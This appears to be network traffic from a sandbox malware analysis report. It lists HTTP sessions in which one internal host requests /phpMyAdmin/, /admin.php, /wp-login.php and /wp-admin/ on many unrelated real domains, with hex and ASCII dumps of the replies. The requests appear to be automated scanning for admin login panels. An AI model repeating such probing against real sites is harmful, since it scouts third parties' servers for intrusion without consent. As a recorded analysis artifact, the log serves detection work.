                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.797517061 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                123192.168.2.6564303.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.590028048 CET228OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.693381071 CET889INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_d/+XWPom+g8Mg3GUvvtmoNes2SDO2jlN1dPakQO9fvTb6+Xjg+KG5DTnhI/hFIH6zqhykU4g5geiNVEJrWwoew
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                124192.168.2.65639085.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.590110064 CET223OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.801888943 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=nb0jx10kifal0loe5mtgtkzf; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.801901102 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.801914930 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.801924944 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.003595114 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.003602982 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                125192.168.2.65641869.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.594556093 CET222OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.760282040 CET228INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 10File not found.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                126192.168.2.65641364.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.594579935 CET227OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                127192.168.2.6564173.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.594615936 CET229OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                128192.168.2.65641664.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.594640970 CET227OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                129192.168.2.65658064.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.978667021 CET224OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.142458916 CET795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 559
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Allow: GET,HEAD
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 45 42 53 49 54 45 2e 57 53 20 2d 20 59 6f 75 72 20 49 6e 74 65 72 6e 65 74 20 41 64 64 72 65 73 73 20 46 6f 72 20 4c 69 66 65 26 74 72 61 64 65 3b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 09 3c 6e 6f 66 72 61 6d 65 73 3e 0a 09 09 3c 70 3e 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 66 72 61 6d 65 73 2e 20 43 6f 6e 74 69 6e 75 65 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>WEBSITE.WS - Your Internet Address For Life&trade;</title><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><frameset rows="100%,*" border="0" frameborder="0"><frame src="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws" scrolling="auto" frameborder="0" /><noframes><p> Your browser does not support frames. Continue to <a href="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws">https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws</a>.</p></noframes></frameset></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                130192.168.2.65658564.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.980329037 CET224OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.155915976 CET795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 559
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Allow: GET,HEAD
